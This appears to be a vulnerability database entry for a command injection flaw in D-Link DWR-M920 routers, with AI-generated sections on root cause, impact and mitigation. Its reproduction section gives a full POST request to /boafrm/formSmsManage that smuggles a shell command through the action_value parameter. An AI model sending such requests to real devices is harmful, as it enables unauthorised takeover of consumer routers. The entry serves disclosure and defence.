CVE-2026-10878
Description
D-Link DWR-M920 devices are vulnerable to remote command injection via the formSmsManage endpoint due to improper handling of the action_value parameter.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
D-Link DWR-M920 devices are vulnerable to remote command injection via the formSmsManage endpoint due to improper handling of the action_value parameter.
Vulnerability
A command injection vulnerability exists in D-Link DWR-M920 devices, specifically affecting versions 1.1.50 and 1.1.70. The vulnerability resides in the formSmsManage route, where the action_value parameter is processed without proper validation. Functions such as sub_41C8E8 and sub_41C9F4 in version 1.1.50, and sub_41EC58 and sub_41ED78 in version 1.1.70, pass this parameter to sprintf without length checks, potentially causing a stack buffer overflow, and then to the system function, leading to command injection [1].
Exploitation
An attacker can exploit this vulnerability remotely by sending a crafted POST request to the /boafrm/formSmsManage endpoint. The request must manipulate the action_value parameter to inject malicious commands. The exploit is publicly available and can be used to trigger command execution [1].
Impact
Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the affected device with the privileges of the running web server process. This could lead to a full compromise of the device, including potential data theft or further network intrusion.
Mitigation
Fixed versions and release dates are not yet disclosed in the available references. No workarounds are provided. The D-Link DWR-M920 is a consumer-grade router, and users should check D-Link's official support channels for any available firmware updates or advisories. Reference [2] provides general product information but no specific mitigation details for this vulnerability.
AI Insight generated on Jun 5, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"The application fails to properly sanitize user-supplied input before passing it to system commands, leading to command injection."
Attack vector
An attacker can remotely send a crafted POST request to the `/boafrm/formSmsManage` endpoint. By manipulating the `action_value` parameter with shell metacharacters and a command, such as `; ls > /sms.txt #`, an attacker can execute arbitrary commands on the system. This is possible due to the lack of input validation and length checks before the parameter is processed by `sprintf` and then passed to the `system` function [ref_id=1].
Affected code
The vulnerability exists in the `formSmsManage` route, specifically within functions like `sub_41C8E8` and `sub_41C9F4` for version 1.1.50, and `sub_41EC58` and `sub_41ED78` for version 1.1.70. These functions retrieve the `action_value` parameter, pass it to `sprintf` without proper checks, and then execute the result using the `system` function [ref_id=1].
What the fix does
The advisory recommends not passing untrusted input directly to system() and instead validating and sanitizing it. This includes allowing only expected characters and rejecting any input containing shell metacharacters. It also suggests avoiding system() entirely if possible, and performing length checks on individual tokens after splitting, not just on the total input length [ref_id=1].
Preconditions
- networkThe target device must be accessible over the network.
- inputThe attacker must be able to send a POST request to the `/boafrm/formSmsManage` endpoint.
Reproduction
First, visit http://192.168.145.157:8080/sms_inbox.htm. Then, send the following POST request to trigger command injection:
```http POST /boafrm/formSmsManage HTTP/1.1 Host: 192.168.145.157:8080 Content-Length: 74 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.145.157:8080 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://192.168.145.157:8080/sms_inbox.htm Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: webuicookie=WvT4tL6z41Z5G/QG8eZ1GnQK Connection: close
action_id=readMsg&action_value=; ls > /sms.txt # ``` [ref_id=1]
Generated on Jun 5, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
6News mentions
0No linked articles in our index yet.